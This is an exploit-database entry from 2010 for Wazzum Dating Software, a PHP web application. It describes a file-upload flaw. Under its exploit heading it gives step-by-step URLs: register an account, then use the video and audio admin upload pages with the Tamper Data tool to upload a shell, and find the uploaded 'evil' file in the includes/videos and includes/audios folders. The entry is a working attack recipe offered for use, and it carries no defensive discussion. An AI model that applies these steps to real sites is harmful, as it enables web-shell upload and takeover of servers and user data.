Wazzum Dating Software Mullti Vulnerability

2010-01-16T00:00:00
ID 1337DAY-ID-11524
Type zdt
Reporter El-Kahina
Modified 2010-01-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================
Wazzum Dating Software Mullti Vulnerability 
===========================================

========================================================================================                 
| ( Title    ) Wazzum Dating Software Mullti Vulnerability   
| ( Author   ) El-Kahina                                                              
| ( email    ) please forgive me                                                                                                                            |
| ( Web Site ) wwww.iqs3cur1ty.com                                                                                                                                
| ( Script   ) http://hotfile.com/dl/32756801/c6b4b5e/Wazzum.zip.html   
| ( Tested on) Lunix Fran?ais v.(9.10 Ubuntu)      
| ( Bug      ) Upload   
|                                                                 
======================      Exploit By EL-Kahina       =================================
 # Exploit  :
  
 1 - Register - Step 1
  
 http://127.0.0.1/Wazzum/register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c
                   
 2 - Register - Step 2
  
 http://127.0.0.1/Wazzum/register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload)
  
 3 - http://127.0.0.1/Wazzum//video_admin.php?type=v (2 upload video) Use Tamper Data
   
 http://127.0.0.1/Wazzum//includes/videos/ to find evil
  
 http://127.0.0.1/Wazzum//audio_admin.php?type=a (2 upload audio) Use Tamper Data
  
 http://127.0.0.1/Wazzum//includes/audios/ to find evil



#  0day.today [2018-01-05]  #